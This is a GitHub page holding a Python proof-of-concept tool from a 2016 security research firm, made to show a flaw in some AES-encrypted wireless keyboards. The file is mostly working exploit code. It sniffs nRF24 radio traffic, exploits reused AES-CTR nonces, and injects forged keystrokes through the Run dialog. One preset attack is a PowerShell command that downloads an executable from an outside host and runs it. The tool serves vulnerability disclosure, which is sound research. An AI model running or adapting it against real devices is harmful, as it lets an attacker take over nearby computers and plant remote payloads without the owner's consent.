-
Notifications
You must be signed in to change notification settings - Fork 28
/
Copy pathkeystroke_injector.py
257 lines (205 loc) · 9.24 KB
/
keystroke_injector.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Keystroke Injector
by Matthias Deeg <[email protected]>
and Gerard Klostermeier <[email protected]>
Proof-of-Concept software tool to demonstrate the keystroke injection
vulnerability of some AES encrypted wireless keyboards
Copyright (C) 2016 SySS GmbH
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
__version__ = '0.7'
__author__ = 'Matthias Deeg, Gerhard Klostermeier'
import argparse
from binascii import hexlify, unhexlify
from lib import nrf24, keyboard
from time import sleep, time
from sys import exit
SCAN_CHANNELS = range(2, 84) # channels to scan
DWELL_TIME = 0.1 # dwell time for each channel in seconds
SCAN_TIME = 2 # scan time in seconds for scan mode heuristics
KEYSTROKE_DELAY = 0.01 # keystroke delay in seconds
# supported devices
DEVICES = {
# Cherry Wireless Keyboard (e. g. wireless desktop set B.UNLIMITED AES)
'cherry' : 'Cherry',
# Perixx Wireless Keyboard (e. g. wireless desktop set PERIDUO-710W)
'perixx' : 'Perixx'
}
# available attack vectors for command execution
ATTACK_VECTORS = {
1 : ("Open calc.exe", "calc"),
2 : ("Open cmd.exe", "cmd"),
3 : ("Classic download & execute attack", u"powershell (new-object System.Net.WebClient).DownloadFile('http://ptmd.sy.gs/syss.exe', '%TEMP%\\syss.exe'); Start-Process '%TEMP%\\syss.exe'")
}
def banner():
"""Show a fancy banner"""
print(" _____ ______ ___ _ _ _____ _ _ \n"
" | __ \\| ____|__ \\| || | | __ \\| | | | \n"
" _ __ | |__) | |__ ) | || |_ | |__) | | __ _ _ _ ___ ___| |_ \n"
" | '_ \\| _ /| __| / /|__ _| | ___/| |/ _` | | | / __|/ _ \\ __| \n"
" | | | | | \\ \\| | / /_ | | | | | | (_| | |_| \\__ \\ __/ |_ \n"
" |_| |_|_| \\_\\_| |____| |_| |_| |_|\\__,_|\\__, |___/\\___|\\__|\n"
" __/ | \n"
" |___/ \n"
"Keystroke Injector v{0} by Matthias Deeg - SySS GmbH (c) 2016".format(__version__))
# main program
if __name__ == '__main__':
# show banner
banner()
# init argument parser
parser = argparse.ArgumentParser()
parser.add_argument('-a', '--address', type=str, help='Address of nRF24 device')
parser.add_argument('-c', '--channels', type=int, nargs='+', help='ShockBurst RF channel', default=range(2, 84), metavar='N')
parser.add_argument('-d', '--device', type=str, help='Target device (supported: cherry, perixx)', required=True)
# parser.add_argument('-x', '--attack', type=str, help='Attack vector')
# parse arguments
args = parser.parse_args()
# set scan channels
SCAN_CHANNELS = args.channels
if args.address:
try:
# address of nRF24 keyboard (CAUTION: Reversed byte order compared to sniffer tools!)
address = args.address.replace(':', '').decode('hex')[::-1][:5]
address_string = ':'.join('{:02X}'.format(ord(b)) for b in address[::-1])
except:
print("[-] Error: Invalid address")
exit(1)
else:
address = ""
try:
# initialize radio
print("[*] Configure nRF24 radio")
radio = nrf24.nrf24()
# enable LNA
radio.enable_lna()
except:
print("[-] Error: Could not initialize nRF24 radio")
exit(1)
try:
# set keyboard
print("[*] Set keyboard: {0}".format(DEVICES[args.device]))
if args.device == 'cherry':
keyboard_device = keyboard.CherryKeyboard
elif args.device == 'perixx':
keyboard_device = keyboard.PerixxKeyboard
except Exception:
print("[-] Error: Unsupported device")
exit(1)
# put the radio in promiscuous mode with given address
if len(address) > 0:
radio.enter_promiscuous_mode(address[-1])
else:
radio.enter_promiscuous_mode()
# set the initial channel
radio.set_channel(SCAN_CHANNELS[0])
# sweep through the channels and decode ESB packets in pseudo-promiscuous mode
print("[*] Scanning for wireless keyboard ...")
last_tune = time()
channel_index = 0
while True:
# increment the channel
if len(SCAN_CHANNELS) > 1 and time() - last_tune > DWELL_TIME:
channel_index = (channel_index + 1) % (len(SCAN_CHANNELS))
radio.set_channel(SCAN_CHANNELS[channel_index])
last_tune = time()
# receive payloads
value = radio.receive_payload()
if len(value) >= 10:
# split the address and payload
address, payload = value[0:5], value[5:]
# convert address to string and reverse byte order
converted_address = address[::-1].tostring()
address_string = ':'.join('{:02X}'.format(b) for b in address)
print("[+] Found nRF24 device with address {0} on channel {1}".format(address_string, SCAN_CHANNELS[channel_index]))
# ask user about device
answer = raw_input("[?] Attack this device (y/n)? ")
if answer[0] == 'y':
break
else:
print("[*] Continue scanning ...")
# put the radio in sniffer mode (ESB w/o auto ACKs)
radio.enter_sniffer_mode(converted_address)
last_tune = time()
channel_index = 0
last_key = 0
packet_count = 0
print("[*] Search for crypto key (actually a key release packet) ...")
while True:
# Cherry does no channel hopping, so we stay tuned on the channel
# found previously
if args.device != 'cherry':
# increment the channel
if len(SCAN_CHANNELS) > 1 and time() - last_tune > DWELL_TIME:
channel_index = (channel_index + 1) % (len(SCAN_CHANNELS))
radio.set_channel(SCAN_CHANNELS[channel_index])
last_tune = time()
# receive payload
value = radio.receive_payload()
if value[0] == 0:
# do some time measurement
last_key = time()
# split the payload from the status byte
payload = value[1:]
# increment packet count
packet_count += 1
# show packet payload
# print('Received payload: {0}'.format(hexlify(payload)))
# heuristic for having a valid release key data packet
if packet_count >= 4 and time() - last_key > SCAN_TIME:
break
print("[+] Found crypto key")
# keystroke injection attack
while True:
print("[*] Please choose your attack vector (0 to quit)")
for av in ATTACK_VECTORS:
print(" {0}) {1}".format(av, ATTACK_VECTORS[av][0]))
print(" 0) Exit")
try:
answer = int(raw_input("[?] Select keystroke injection attack: "))
if answer == 0:
break
if answer in ATTACK_VECTORS.keys():
attack_keystrokes = ATTACK_VECTORS[answer][1]
# keystroke injection
print("[*] Start keystroke injection ...")
# initialize keyboard with latest assumed key release packet to exploit
# AES-CTR crypto with reusable nonces
if args.device == 'cherry':
kbd = keyboard_device(payload.tostring())
elif args.device == 'perixx':
kbd = keyboard_device(payload.tostring())
# send keystrokes for chosen attack
keystrokes = []
keystrokes.append(kbd.keyCommand(keyboard.MODIFIER_NONE, keyboard.KEY_NONE))
keystrokes.append(kbd.keyCommand(keyboard.MODIFIER_GUI_RIGHT, keyboard.KEY_R))
keystrokes.append(kbd.keyCommand(keyboard.MODIFIER_NONE, keyboard.KEY_NONE))
# send attack keystrokes
for k in keystrokes:
radio.transmit_payload(k)
sleep(KEYSTROKE_DELAY)
# need small delay after WIN + R
sleep(0.1)
keystrokes = []
keystrokes = kbd.getKeystrokes(attack_keystrokes)
keystrokes += kbd.getKeystroke(keyboard.KEY_RETURN)
# send attack keystrokes with a small delay
for k in keystrokes:
radio.transmit_payload(k)
sleep(KEYSTROKE_DELAY)
print("[*] Done.")
else:
print("[-] Invalid attack")
except ValueError:
print("[-] Invalid input")
print("[*] Done with keystroke injections.\n Have a nice day!")